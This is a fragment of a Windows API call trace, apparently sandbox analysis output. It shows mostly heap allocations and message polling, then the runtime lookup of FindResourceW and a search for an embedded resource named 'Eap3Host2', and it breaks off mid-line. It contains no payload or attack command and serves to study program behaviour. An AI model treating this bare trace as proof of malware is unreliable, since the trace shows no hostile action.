[0119.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458f58 [0119.695] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.695] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee98 [0119.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3d0 [0119.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef750 [0119.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0119.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0119.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef890 [0119.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491838 [0119.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd448 [0119.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fece0 [0119.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef760 [0119.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3e8 [0119.696] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.696] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0119.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0119.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a58 [0119.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b58 [0119.696] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.696] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0119.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0119.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a78 [0119.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458f98 [0119.697] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.697] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0119.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0119.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491838 [0119.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458958 [0119.697] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.697] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0119.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0119.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0119.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b58 [0119.697] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.697] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef890 [0119.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0119.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918b8 [0119.697] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458e58 [0119.698] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.698] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.698] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0119.698] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0119.698] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0119.698] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d58 [0119.698] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.698] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0119.698] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0119.698] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0119.698] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12feb00 [0119.698] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0119.698] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd610 [0119.698] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.698] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.698] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.698] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.698] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.698] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.698] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.699] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.699] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.699] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.699] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.699] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.699] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.699] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.699] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.699] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.699] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.699] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.699] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.699] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.699] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.699] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.699] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.700] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.700] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.700] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.700] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.700] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.700] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.700] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.700] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.700] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.700] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.700] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.700] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.700] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.700] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.700] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.700] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.700] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.700] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.700] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.701] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.701] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.701] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.701] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.701] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.701] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.701] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.701] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.701] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.701] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.701] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.701] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.701] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.701] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.702] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.702] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.702] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.702] CharLowerBuffW (in: lpsz="ptr", cchLength=0x3 | out: lpsz="ptr") returned 0x3 [0119.702] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x74650000 [0119.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FindResourceW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0119.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FindResourceW", cchWideChar=14, lpMultiByteStr=0x14bd970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FindResourceW", lpUsedDefaultChar=0x0) returned 14 [0119.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd970 | out: hHeap=0x12c0000) returned 1 [0119.703] GetProcAddress (hModule=0x74650000, lpProcName="FindResourceW") returned 0x74672a40 [0119.703] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd868 | out: hHeap=0x12c0000) returned 1 [0119.703] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0119.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff028 [0119.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef720 [0119.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef760 [0119.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0119.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20002) returned 0x1320068 [0119.703] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0119.703] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef760 | out: hHeap=0x12c0000) returned 1 [0119.703] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0119.703] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff028 | out: hHeap=0x12c0000) returned 1 [0119.703] FindResourceW (hModule=0x0, lpName="Eap3Host2", lpType=0x8) returned 0xfe7698 [0119.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0119.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x1302b30 [0119.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd958 [0119.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8b0 [0119.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd808 [0119.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9b8 [0119.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef890 [0119.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9b8 | out: hHeap=0x12c0000) returned 1 [0119.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0119.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0119.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8f8 [0119.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9a0 [0119.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd928 [0119.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef890 [0119.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd928 | out: hHeap=0x12c0000) returned 1 [0119.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0119.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9a0 | out: hHeap=0x12c0000) returned 1 [0119.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd718 [0119.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd730 [0119.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd868 [0119.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7f0 [0119.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd868 | out: hHeap=0x12c0000) returned 1 [0119.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0a0 [0119.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1320068 | out: hHeap=0x12c0000) returned 1 [0119.705] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd808 [0119.705] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd970 [0119.705] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd820 [0119.705] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef760 [0119.705] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd820 | out: hHeap=0x12c0000) returned 1 [0119.705] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef760 | out: hHeap=0x12c0000) returned 1 [0119.705] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd970 | out: hHeap=0x12c0000) returned 1 [0119.705] FreeLibrary (hLibModule=0x74650000) returned 1 [0119.705] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.705] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0119.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7c0 | out: hHeap=0x12c0000) returned 1 [0119.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff000 | out: hHeap=0x12c0000) returned 1 [0119.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8e0 | out: hHeap=0x12c0000) returned 1 [0119.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0119.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0119.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd628 | out: hHeap=0x12c0000) returned 1 [0119.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd490 | out: hHeap=0x12c0000) returned 1 [0119.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0119.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3e8 | out: hHeap=0x12c0000) returned 1 [0119.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0119.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5b0 | out: hHeap=0x12c0000) returned 1 [0119.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0119.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5e0 | out: hHeap=0x12c0000) returned 1 [0119.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0119.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0119.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0119.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6e8 | out: hHeap=0x12c0000) returned 1 [0119.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd688 | out: hHeap=0x12c0000) returned 1 [0119.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6d0 | out: hHeap=0x12c0000) returned 1 [0119.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd850 | out: hHeap=0x12c0000) returned 1 [0119.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8c8 | out: hHeap=0x12c0000) returned 1 [0119.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd898 | out: hHeap=0x12c0000) returned 1 [0119.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14a3730 | out: hHeap=0x12c0000) returned 1 [0119.707] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0119.707] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd910 [0119.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0119.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd910 | out: hHeap=0x12c0000) returned 1 [0119.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8b0 | out: hHeap=0x12c0000) returned 1 [0119.707] HeapFree (in: 